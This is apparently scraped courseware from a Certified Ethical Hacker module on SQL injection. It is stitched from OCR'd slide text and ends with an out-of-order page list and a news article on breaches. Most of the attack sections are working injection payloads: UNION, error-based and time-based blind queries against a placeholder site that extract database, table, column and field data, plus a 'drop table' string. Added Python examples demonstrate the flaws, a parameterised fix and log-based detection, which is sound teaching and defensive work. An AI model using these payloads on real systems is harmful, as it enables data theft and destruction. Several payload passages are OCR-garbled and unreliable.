network or the system to be tested. The first job of the tester is to find out the location and
system infrastructure. The tester tries to identify the vulnerabilities of web applications from
the attacker's perspective. Use special characters, white space, SQL keywords, oversized
requests, etc. to determine the various conditions of the web application. The following are the
various issues related to SQL injection black box penetration testing:
Detecting SQL Injection Issues
Send single quotes as the input data to catch instances where the user input is not sanitized.
Send double quotes as the input data to catch instances where the user input is not sanitized.
Detecting Input Sanitization
Use the right square bracket (the ] character) as the input data to catch instances where the
user input is used as part of a SQL identifier without any input sanitization.
Detecting SQL Modification
Send long strings of single quote characters (or right square brackets or double quotes). These
max out the return values from REPLACE and QUOTENAME functions and might truncate the
command variable used to hold the SQL statement.


Detecting Truncation Issues
Send long strings of junk data, just as you would send strings to detect buffer overruns; this
action might throw SQL errors on the page.
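The truncation failure behind the "Detecting SQL Modification" and "Detecting Truncation Issues" checks above, as an added example that is not part of the module: a dynamic UPDATE statement is escaped with a QUOTENAME-style function and stored in a fixed-width variable, the way a T-SQL stored procedure with DECLARE @cmd nvarchar(N) would. The statement text, the variable width and the probe values are all constructed for the demo.

```python
"""Added example: simulates what the black-box truncation checks look for.
T-SQL silently drops the tail when a longer string is assigned to a shorter
nvarchar variable; QUOTENAME/REPLACE double every quote, so a run of quotes
can push the escaped statement past the buffer. Sizes here are constructed."""

CMD_WIDTH = 64  # simulated DECLARE @cmd nvarchar(64)
PREFIX = "UPDATE Users SET Password=N"  # fixed SQL text before the first literal
MIDDLE = " WHERE login=N"              # fixed SQL text between the literals


def quotename(value):
    """T-SQL QUOTENAME(@value, ''''): wrap in single quotes, doubling embedded ones."""
    return "'" + value.replace("'", "''") + "'"


def build_cmd(new_password, login, width=CMD_WIDTH):
    """SET @cmd = PREFIX + QUOTENAME(@pw, '''') + MIDDLE + QUOTENAME(@login, '''')
    Returns the (possibly truncated) command and whether truncation happened."""
    full = PREFIX + quotename(new_password) + MIDDLE + quotename(login)
    return full[:width], len(full) > width


def analyse(cmd):
    """What the tester sees: an odd number of quotes means a SQL syntax error,
    a missing WHERE means the statement no longer targets one row."""
    return {"balanced": cmd.count("'") % 2 == 0, "has_where": " WHERE " in cmd}


def needed_width(*literals):
    """Worst-case width: every character of every literal may be a quote that
    QUOTENAME doubles, plus the two surrounding quotes. Sizing @cmd this way
    (or better, binding the values with sp_executesql) removes the truncation."""
    return len(PREFIX) + len(MIDDLE) + sum(2 * len(v) + 2 for v in literals)


def probe(width=CMD_WIDTH):
    """Replays the check: a normal value, then a long run of single quotes."""
    out = {}
    for label, password in (("normal", "hello"), ("quote_run", "'" * 40)):
        cmd, truncated = build_cmd(password, "alice", width)
        out[label] = dict(truncated=truncated, **analyse(cmd))
    return out


if __name__ == "__main__":
    for label, result in probe().items():
        print(label, result)
    print("width needed for the quote run:", needed_width("'" * 40, "alice"))
```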



Testing for SQL Injection
Some of the testing strings with variations used in the database handling commonly
bypass the authentication mechanism. You can use this cheat sheet to test for SQL injection:

F IG U R E 14.11: Testing for SQ L Injection


Testing for SQL Injection (Cont'd)
Additional testing strings used to test for SQL injection include:
[Figure: table of additional SQL injection testing strings]

F IG U R E 14.12: A dditional Testing Strings

Module Flow
So far, we have discussed various SQL injection concepts and how to test web applications for SQL injection. Now we will discuss various types of SQL injection. SQL injection attacks are performed in many different ways by poisoning the SQL query, which is used to access the database.

SQL Injection Concepts
Testing for SQL Injection
Types of SQL Injection
Blind SQL Injection
SQL Injection Methodology
Advanced SQL Injection
SQL Injection Tools
Evasion Techniques
Countermeasures

This section gives insight into the different ways to handle SQL injection attacks. Some simple
SQL injection attacks, including blind SQL injection attacks, are explained with the help of
examples.

Types of SQL Injection
The following are the various types of SQL injection:

SQL Injection
SQL injection is an attack in which malicious code is injected through a SQL query, which can read sensitive data and can even modify (insert/update/delete) the data. SQL injection is mainly classified into two types:

Blind SQL Injection
Wherever there is a web application vulnerability, blind SQL injection can be used either to access sensitive data or to destroy the data. The attacker can steal the data by asking a series of true or false questions through SQL statements.

Simple SQL Injection
A simple SQL injection script builds a SQL query by concatenating hard-coded strings together with a string entered by the user. Simple SQL injection is again divided into two types:

UNION SQL Injection: UNION SQL injection is used when the attacker uses the UNION command. The attacker checks for the vulnerability by adding a tick to the end of a ".php?id=" file.

Error Based SQL Injection: The attacker makes use of the database-level error messages
disclosed by an application. This is very useful to build a vulnerability exploit request.

Simple SQL Injection Attacks
A simple SQL injection script builds an SQL query by concatenating hard-coded strings together with a string entered by the user. The following are the various elements associated with simple SQL injection attacks:

System Stored Procedure: Attackers exploit databases' stored procedures to perpetrate their attacks.

End of Line Comment: After injecting code into a particular field, legitimate code that follows is nullified through the use of end of line comments.
SELECT * FROM user WHERE name = 'x' AND userid IS NULL; --

Illegal/Logically Incorrect Query: An attacker may gain knowledge of injectable parameters, data types, names of tables, etc. by injecting illegal/logically incorrect requests.

Tautology: Injecting statements that are always true so that queries always return results upon evaluation of a WHERE condition.
SELECT * FROM users WHERE name = '' OR '1'='1';

Union Query: The "UNION SELECT" statement returns the union of the intended dataset with the target dataset.
SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber, 1, 1 FROM CreditCardTable
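The tautology, end-of-line comment and UNION queries above, run against an in-memory SQLite database as an added example (not from the courseware): the concatenating lookups reproduce the defect, and the parameterised lookup shows the fix. The users and CreditCardTable tables and their rows are constructed sample data.

```python
import sqlite3

# Constructed sample schema mirroring the slide's query: names, phones and
# addresses in one table, card numbers in another.
SCHEMA = """
CREATE TABLE users (id INTEGER, name TEXT, phone TEXT, address TEXT);
INSERT INTO users VALUES (1, 'alice', '555-0100', '1 Main St');
INSERT INTO users VALUES (2, 'bob',   '555-0101', '2 Main St');
CREATE TABLE CreditCardTable (creditCardNumber TEXT);
INSERT INTO CreditCardTable VALUES ('4111-XXXX-XXXX-1111');
"""


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def lookup_by_name_vulnerable(con: sqlite3.Connection, name: str) -> list:
    """'Simple SQL injection' pattern: the user string is concatenated into the
    SQL text, so a quote in it closes the literal and the rest is parsed as SQL."""
    sql = "SELECT name, phone, address FROM users WHERE name = '" + name + "'"
    return con.execute(sql).fetchall()


def lookup_by_id_vulnerable(con: sqlite3.Connection, user_id: str) -> list:
    """Same defect with an unquoted numeric parameter, as in the slide's
    'Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable'."""
    sql = "SELECT name, phone, address FROM users WHERE id = " + user_id
    return con.execute(sql).fetchall()


def lookup_by_name_parameterised(con: sqlite3.Connection, name: str) -> list:
    """Hardened form: the value is bound, never parsed, so the same payloads
    are just a name that matches no row."""
    sql = "SELECT name, phone, address FROM users WHERE name = ?"
    return con.execute(sql, (name,)).fetchall()


def demo() -> dict:
    con = make_db()
    return {
        # Tautology: WHERE name = '' OR '1'='1'  -> every row comes back
        "tautology": lookup_by_name_vulnerable(con, "' OR '1'='1"),
        # End-of-line comment: WHERE name = 'x' OR 1=1 --'  -> closing quote is commented out
        "comment": lookup_by_name_vulnerable(con, "x' OR 1=1 --"),
        # UNION: the card table is appended to the intended three-column result set
        "union": lookup_by_id_vulnerable(
            con, "1 UNION ALL SELECT creditCardNumber, 1, 1 FROM CreditCardTable"),
        # Bound parameter: the tautology string is compared as data and matches nothing
        "hardened": lookup_by_name_parameterised(con, "' OR '1'='1"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:9s} -> {rows}")
```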

Union SQL Injection Example
UNION SQL injection is used when the attacker uses the UNION command. The attacker checks for the vulnerability by adding a tick to the end of a ".php?id=" file. If it comes back with a MySQL error, the site is most likely vulnerable to UNION SQL injection. They proceed to use ORDER BY to find the number of columns, and at the end, they use the UNION ALL SELECT command.

Extract Database Name
This is an example of union SQL injection in which an attacker tries to extract a database name:
http://juggyboy.com/page.aspx?id=1 UNION SELECT ALL 1,DB_NAME,3,4--
[DB_NAME] Returned from the server

Extract Database Tables
This is an example of union SQL injection that an attacker uses to extract database tables:
http://juggyboy.com/page.aspx?id=1 UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--
[EMPLOYEE_TABLE] Returned from the server

Extract Table Column Names
This is an example of union SQL injection that an attacker uses to extract table column names:
http://juggyboy.com/page.aspx?id=1 UNION SELECT ALL 1,column_name,3,4 from DB_NAME.information_schema.columns where table_name='EMPLOYEE_TABLE'--
[EMPLOYEE_NAME] Returned from the server

Extract 1st Field Data
This is an example of union SQL injection that an attacker uses to extract field data:
http://juggyboy.com/page.aspx?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from EMPLOYEE_NAME--
[FIELD 1 VALUE] Returned from the server

SQL Injection Error Based
The attacker makes use of the database-level error messages disclosed by an application. This is very useful to build a vulnerability exploit request. There are even chances of automated exploits based on the different error messages generated by the database server.

Extract Database Name
The following is the code to extract the database name through the error-based SQL injection method:
http://juggyboy.com/page.aspx?id=1 or 1=convert(int,(DB_NAME))--
Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.

Extract 1st Table Column Name
The following is the code to extract the first table column name through the error-based SQL injection method:
http://juggyboy.com/page.aspx?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))--
Syntax error converting the nvarchar value '[COLUMN NAME 1]' to a column of data type int.

Extract 1st Database Table
The following is the code to extract the first database table through the error-based SQL injection method:
http://juggyboy.com/page.aspx?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))--
Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.

Extract 1st Field Of 1st Row (Data)
The following is the code to extract the first field of the first row (data) through the error-based SQL injection method:
http://juggyboy.com/page.aspx?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))--
Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a column of data type int.

Module Flow
Previously we discussed various types of SQL injection attacks. Now, we will discuss each type of SQL injection attack in detail. Let us begin with the blind SQL injection attack. Blind SQL injection is a method that is implemented by the attacker when any server responds with any error message stating that the syntax is incorrect.

SQL Injection Concepts
Testing for SQL Injection
Types of SQL Injection
Blind SQL Injection
SQL Injection Methodology
Advanced SQL Injection
SQL Injection Tools
Evasion Techniques
Countermeasures

This section introduces and gives a detailed explanation of blind SQL injection attacks.

What Is Blind SQL Injection?
Blind SQL injection is used when a web application is vulnerable to SQL injection. In many aspects, SQL injection and blind injection are the same, but there are slight differences. SQL injection depends on error messages, but blind injection does not depend on error messages. Wherever there is a web application vulnerability, blind SQL injection can be used either to access sensitive data or to destroy the data. Attackers can steal the data by asking a series of true or false questions through SQL statements. The results of the injection are not visible to the attacker. This is also more time consuming, because every time a new bit is recovered, a new statement has to be generated.

No Error Messages Returned
In this attack, when the attacker tries to perform SQL injection using a query such as "JuggyBoy'; drop table Orders --", in simple SQL injection the server throws an error message with a detailed explanation of the error, including database driver and ODBC SQL Server details; in blind SQL injection, however, the error message only says that there is an error and that the request was unsuccessful, without any details.

JuggyBoy'; drop table Orders --

Simple SQL Injection:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/shopping/buy.aspx, line 52

Blind SQL Injection (Attack Successful): no error details are returned.

FIGURE 14.13: No Error Messages Returned

Blind SQL Injection: WAITFOR DELAY YES or NO Response
Step 1: ; IF EXISTS(SELECT * FROM creditcard) WAITFOR DELAY '0:0:10'--
Step 2: Check if database "creditcard" exists or not.
Step 3: If No, it displays "We are unable to process your request. Please try back later".
Step 4: If YES, it sleeps for 10 seconds. After 10 seconds it displays "We are unable to process your request. Please try back later".
Since no error messages are returned, use the 'waitfor delay' command to check the SQL execution status.

WAITFOR DELAY 'time' (Seconds)
This is just like sleep: it waits for a specified time. It is a CPU-safe way to make a database wait.
WAITFOR DELAY '0:0:10'--

BENCHMARK() (Minutes)
This command runs on MySQL Server.
BENCHMARK(howmanytimes, do this)

; IF EXISTS (SELECT * FROM creditcard) WAITFOR DELAY '0:0:10'--

Oops! We are unable to process your request. Please try back later.

Since no error messages are returned, use the 'waitfor delay' command to check the SQL execution status.

Oops! We are unable to process your request. Please try back later.

FIGURE 14.14: WAITFOR DELAY YES or NO Response

Blind SQL Injection - Exploitation (MySQL)
SQL injection exploitation depends on the SQL dialect in use. An attacker merges two SQL queries to get more data. The attacker tries to exploit the UNION operator to easily get more information from the database management system. Blind injections help an attacker to bypass more filters easily. One of the main differences in blind SQL injection is that entries are read symbol by symbol.

Searching for the first character of the first table entry
/?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1),1,1))=97,555,777)
If the table "users" contains a column "pass" and the first character of the first entry in this column is 97 (letter "a"), then the DBMS returns TRUE; otherwise, FALSE.

Searching for the second character of the first table entry
/?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1),2,1))=97,555,777)
If the table "users" contains a column "pass" and the second character of the first entry in this column is 97 (letter "a"), then the DBMS returns TRUE; otherwise, FALSE.

Blind SQL Injection - Extract Database User
In the blind SQL injection method, the attacker can extract the database user name. The attacker can probe the database server with yes/no questions to extract information from it. Finding the first letter of a user name with a binary search takes 7 requests, and for an 8-character-long name it takes 56 requests.

Finding a full username of 8 characters using the binary search method takes 56 requests

Check for username length
http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--

Check if 1st character in username contains 'a' (a=97), 'b', or 'c' etc.
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--

Check if 2nd character in username contains 'a' (a=97), 'b', or 'c' etc.
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=97) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=99) WAITFOR DELAY '00:00:10'--

Check if 3rd character in username contains 'a' (a=97), 'b', or 'c' etc.
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=97) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=98) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=99) WAITFOR DELAY '00:00:10'--

FIGURE 14.15: Extract Database User

Blind SQL Injection - Extract Database Name
In the blind SQL injection method, the attacker can extract the database name using the time-based blind SQL injection method. Here, the attacker can brute force the database name by noting the time before the query is executed and the time after query execution; then he or she can assess from the result that if the time lapse is 10 seconds, the name can be 'A'; otherwise, if it took 2 seconds, it can't be 'A'.

Check for Database Name Length and Name
http://juggyboy.com/page.aspx?id=1; IF (LEN(DB_NAME())=4) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((DB_NAME()),1,1)))=97) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((DB_NAME()),2,1)))=98) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((DB_NAME()),3,1)))=99) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((DB_NAME()),4,1)))=100) WAITFOR DELAY '00:00:10'--

Database Name = ABCD

Extract 1st Database Table
http://juggyboy.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype='U')=3) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=101) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=109) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=112) WAITFOR DELAY '00:00:10'--

Table Name = EMP

FIGURE 14.16: Extract Database Name

Blind SQL Injection - Extract Column Name
In the blind SQL injection method, the attacker can extract the column names using different brute force methods or tools, with which he or she can check for the first table column name and the second table column name.
Extract 1st Table Column Name
h t tp :/ / ju g g y b o y .coct/page . aspx‫ ־‬id - l
*
I F (LEN(SELECT TOP 1 co lu s ‫־‬r . _ r . f r o n
whore t a b le name- ‫ י‬EM I'‫ - ) י‬J ) MA1TFOR DELAY ■00:00:10

ABCD. in fo r m a tio n _ 9 c h e n a . colu m n s

h t tp :/ / ju g g y b o y . co«/p»g• 1 1 p x ?1 d s l: 1r (A S C II (lo v e r ( s u b s t r in g ( (SELECT TOP 1 e o lim n name from
ABCD. in forma t io : _schw»n‫ ״‬c o lu m n s where ta b le _ n a !r « « ' E M P ') , 1 , 1 ) ) )■101) WAIYFOR DELAY '00 0 0 :1 0 ' —
*

1

h ttp :/ / ju g g y b o y .c o n / p a g e .asp x ?id - 1 . I F (A S C II(lo w e r (s u b s tr in g ((S E L E C T TOP 1 colunn_nane from
ABCD. inform ataon_scheraa. columns where ta b le_r.am e -'E M P') ,2 ,1 )) )-105) WAITFOR DELAY ‫- י 01 :00 :00 י‬h ttp :/ / ju g g y b o y .c o re / p a g e .a s p x ? ld = l; I F (A S C II(lo w e r (s u b s tr in g ((S E L E C T TOP 1 column nano from
A B C D .in fo rm atio n _B c h an a.columns where table_ram e= ' EM P ') , 3 , 1 ) ) )■100) WA1TFOR DELAY '0 0 :0 0 :1 0 '- -

Column Name =EID

Extract 2nd Table Column Name
h te p ://j u g g y b o y .c a a /p a g e .& £ p x ? 3 .d = l; I F (1-EN | SELECT TCS 1 c o l a n r . i x e f r c n ABCD. i n f o r a a t i s r . s c h a i u . colum ns x k e re
t a b l e _ ‫ ״‬a n e - ‫־‬EMP’ a n d c o lu n n _ n a n s> EID 4- ( ‫ ־‬KATTrOP DELAY '0 0 : 0 0 7 1 0 '- )
h t t p : / / j u g g y b o y • 0 c « /p « g * .a « p x '>1.*Bl r I F (ASCI I ( lo w e r ( s u b s t r i n g ( (SKLECT TOP 1 eolumn_nacr* from
ABCD. i n f o r a a tio n _ 3 c h c a a . c o l us® ‫ ב‬w h ere ta b lc _ n m r^ ■ ‫ ־‬EH? ‫ * ־‬a d c o 1 w _ 3 c o k > ' E IS ' ) , 1 ,1 ) ) ) ■100) WAITTOR
h t t p : / / J u g g y b o y .c c a / p a g e . a s p x ‫ ־‬d E i ; i f (ASCII (lo w e r ( s u b s t r i n g ( (SELECT TOP l colux» _n<*r« f r o n
>l
A B C D .in fo z tta tio n s c h s a a .c o lu a m • w h ere t a b l e m m - ' EMP‫ ־‬a nd ‫־. . •»* .« ־‬
>a*e> EID 101- ( ( (2 , 1 , (‫ )־‬WAITFOR
h t t p : / / j u g g y b o y . c o n / p a g e . a s p x * i d - l ; 2F ( A S C I I ( lo w e r ( s u b s tr in g ( (SELECT TOP 1 c o lu n ! >«x« from
ABC□, i n f o n r j t i o n e rh o n a e o l u m i w h ere t a b l e nw e=E N S >' and ‫ . ־ ־‬i n r n a a e V E I ' ) , 3 , 1 )7 ) =i 12) WAITFOR
h t t p ! / / j u g g y b o y . a a n /p a g e . a s p x ? d = l .* I F (ASCII (lo w e r ( s u b s tr .rv g ( (SELECT TOP 1 colum n nacce f r o n
ABCD. in f o r m a tl o n _ s c h e a a . c o lu n n s w here ta b le _ n a & e > ‫־‬EMP' a nd colu*r_r»a»e>• EID ) ,4 , 1) ) )■116) WAITFOR

1

1

1

DELAY '0 0 : 0 0 : 1 0 '- DELAY

0 0 : 0 0 : 1 0 '- -

DELAY

0 0 :0 0 :1 0 • - -

DELAY

0 0 : 0 0 : 1 0 '- -

Column Name = DEPT

FIGURE 14.17: Extract Database User
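The character-by-character probes shown above leave a distinctive trace in web server logs, which is where a defender catches them. The following Python script is an added detection example, not code from the CEH module: it scans constructed access log lines for the building blocks of the technique (a stacked conditional, a quoted WAITFOR DELAY, ASCII/substring character tests and information_schema enumeration) and treats a response that stalled for about the requested delay as corroboration. The log format with its trailing response-time field, the client addresses, the request lines and the 5-second threshold are all constructed for this example.

```python
"""Spot time-based blind SQL injection probes in web server access logs.

Added detection example, not code from the CEH module. The log format,
the client addresses, the request lines and the 5-second threshold are all
constructed for this example.
"""
import re
from urllib.parse import unquote_plus

# Constructed access log lines: combined log format plus a trailing
# response-time field in milliseconds. Lines 2 and 3 carry the length and
# first-character probes described above; the last line is a harmless search.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2012:13:55:36 +0000] "GET /page.aspx?id=1 HTTP/1.1" 200 2326 12
203.0.113.5 - - [10/Oct/2012:13:55:40 +0000] "GET /page.aspx?id=1;%20IF%20(LEN(SELECT%20TOP%201%20column_name%20from%20ABCD.information_schema.columns%20where%20table_name=%27EMP%27)=3)%20WAITFOR%20DELAY%20%2700:00:10%27-- HTTP/1.1" 200 2326 10014
203.0.113.5 - - [10/Oct/2012:13:55:51 +0000] "GET /page.aspx?id=1;%20IF%20(ASCII(lower(substring((SELECT%20TOP%201%20column_name%20from%20ABCD.information_schema.columns%20where%20table_name=%27EMP%27),1,1)))=101)%20WAITFOR%20DELAY%20%2700:00:10%27-- HTTP/1.1" 200 2326 10021
198.51.100.7 - - [10/Oct/2012:13:56:02 +0000] "GET /page.aspx?id=42 HTTP/1.1" 200 2310 9
198.51.100.7 - - [10/Oct/2012:13:56:05 +0000] "GET /search.aspx?q=waitfor+delay HTTP/1.1" 200 1802 15
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<ms>\d+)$'
)

# Each indicator is one building block of the technique shown in the figure.
INDICATORS = {
    "time_delay": re.compile(r"\bwaitfor\s+delay\s+'\d{2}:\d{2}:\d{2}'", re.I),
    "stacked_conditional": re.compile(r";\s*if\s*\(", re.I),
    "char_probe": re.compile(r"\bascii\s*\(\s*(?:lower\s*\()?\s*substring\s*\(", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:columns|tables)\b", re.I),
}
SLOW_MS = 5000  # constructed threshold; a 10-second WAITFOR shows up as a ~10 s response


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["ms"] = int(entry["ms"])
    # Decode percent-encoding so the SQL keywords are visible to the patterns.
    entry["decoded"] = unquote_plus(entry["target"])
    return entry


def scan(log_text):
    """Return one alert per log line that looks like a conditional delay probe."""
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(entry["decoded"])]
        delayed = entry["ms"] >= SLOW_MS
        # A bare keyword typed into a search box is not an injection: require the
        # quoted WAITFOR DELAY construct, and either the stacked "; IF (" wrapper
        # or a response that actually stalled for about the requested time.
        if "time_delay" in hits and ("stacked_conditional" in hits or delayed):
            alerts.append({
                "ip": entry["ip"],
                "ts": entry["ts"],
                "hits": hits,
                "delayed": delayed,
                "ms": entry["ms"],
                "request": entry["decoded"][:70],
            })
    return alerts


def probes_per_client(alerts):
    """Count alerts per client address: extraction needs one probe per
    character candidate, so a burst from a single source is the tell."""
    counts = {}
    for alert in alerts:
        counts[alert["ip"]] = counts.get(alert["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for alert in found:
        print(f"{alert['ts']} {alert['ip']} {alert['ms']}ms {alert['hits']} {alert['request']}")
    print("probes per client:", probes_per_client(found))
```

Run on the sample, the two probe lines from 203.0.113.5 are reported with both the pattern hits and the ten-second stall, while the search query containing only the words "waitfor delay" is ignored because it lacks the quoted time literal and did not slow the server. The per-client count is the useful aggregation in practice: each recovered character costs the attacker several requests, so the volume from one address grows quickly.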

Module 14 Page 2052
Ce hv8 module 14 sql injection

  • 1. S Q L In je c tio n Module 14
  • 2. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL Injection IV/lnrlnlo 1A E t h ic a l H a c k i n g a n d C o u n t e r m e a s u r e s V8 M o d u l e 1 4 : S Q L I n je c t io n E x a m 3 1 2 -5 0 Module 14 Page 1987 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 3. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Security News Barclays: 97 Percent of Data Breaches Still due to S Q L Injection SQ injection attacks have been around for m than ten years, L ore an security professionals are m than capable of protecting d ore ag st them yet 9 percent of data breaches worldwide are still due ain ; 7 to an SQ injection som here along the lin according to N Jones, L ew e, eira head of paym security for Barclaycard. ent Speaking at the Infosecurity Europe Press Conference in London this w eek, Jones said that hackers are taking advantage of businesses with inadequate an often outdated inform d ation security practices. C g the m recent itin ost fig res fromthe N u ational Fraud A uthority, she said that identity fraud co sts the U m than £ .7 b n every year, and affects m than 1 m n K ore 2 illio ore .8 illio people. "Data breaches have becom a statistical certainty," saidJones. "If you look e at w the p b individ is concerned about, protecting personal hat u lic ual inform ation isactually at the sam level inthe scale of p lic social concerns e ub as preventing crim e." ‫ז‬ http://news.techworld.com Copyright © b y EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited. S e c u rity N ew s Neuis B a r c l a y s : 97 P e r c e n t o f D a t a B r e a c h e s S t i l l D u e t o S Q L In je c tio n Source: http://news.techworld.com SQL injection attacks have been around for more than ten years, and security professionals are more than capable of protecting against them; yet 97 percent of data breaches worldwide are still due to an SQL injection somewhere along the line, according to Neira Jones, head of payment security for Barclaycard. Speaking at the Infosecurity Europe Press Conference in London this week, Jones said that hackers are taking advantage of businesses with inadequate and often outdated information security practices. 
Citing the most recent figures from the National Fraud Authority, she said that identity fraud costs the UK more than £2.7 billion every year, and affects more than 1.8 million people. "Data breaches have become a statistical certainty," said Jones. "If you look at what the public individual is concerned about, protecting personal information is actually at the same level in the scale of public social concerns as preventing crime." Module 14 Page 1988 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 4. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL injection is a code injection technique that exploits security vulnerability in a website's software. Arbitrary data is inserted into a string of code that is eventually executed by a database. The result is that the attacker can execute arbitrary SQL queries or commands on the backend database server through the web application. In October 2011, for example, attackers planted malicious JavaScript on Microsoft's ASP.Net platform. This caused the visitor's browser to load an iframe with one of two remote sites. From there, the iframe attempted to plant malware on the visitor's PC via a number of browser drive-by exploits. Microsoft has been offering ASP.Net programmers information on how to protect against SQL injection attacks since at least 2005. However, the attack still managed to affect around 180,000 pages. Jones said that, with the number of interconnected devices on the planet set to exceed the number of humans by 2015, cybercrime and data protection need to take higher priority on the board's agenda. In order for this to happen, however, the Chief Information Security Officer (CISO) needs to assess the level of risk within their organisation, and take one step at a time. "I always say, if anyone says APT [advanced persistent threat] in the room, an angel dies in heaven, because APTs are not the problem," said Jones. "I'm not saying that they're not real, but let's fix the basics first. Are organisations completely certain they're not vulnerable to SQL injections? And have they coded their web application securely?" Generally it takes between 6 and 8 months for an organisation to find out it has been breached, Jones added. However, by understanding their risk profile and taking simple proactive measures, such as threat scenario modelling, companies could prevent 87 percent of attacks. 
Copyright © IDG 2012 By Sophie Curtis http://news.techworld.com/securitv/3331283/barclavs-97-percent-of-data-breaches-still-due-tosal-iniection/ Module 14 Page 1989 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 5. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker M odule Objectives J Network Reconnaissance Using SQL Injection J SQL Injection Tools J J Evasion Technique How to Defend Against SQL Injection Attacks J SQL Injection Detection Password Grabbing J SQL Injection Detection Tools SQL Injection Attacks J Bypass Website Logins Using SQL Injection J J SQL Injection J J SQL Injection Attack Characters J Testing for SQL Injection J Types of SQL Injection J Blind SQL Injection J CEH SQL Injection Methodology J Advanced SQL Injection Copyright © b y EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited. M o d u le O b je c tiv e s This module introduces you the concept of SQL injection and how an attacker can exploit this attack methodology on the Internet. At the end of this module, you will be familiar with: e SQL Injection © Advanced SQL Injection e SQL Injection Attacks s Bypass Website Logins Using SQL Injection e SQL Injection Detection Q Password Grabbing Q SQL Injection Attack Characters Q Network Reconnaissance Using SQL Injection 0 Testing for SQL Injection e SQL Injection Tools e Types of SQL Injection e Evasion Technique e Blind SQL Injection e How to Defend Against SQL Injection Attacks e SQL Injection Methodology Q SQL Injection Detection Tools Module 14 Page 1990 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
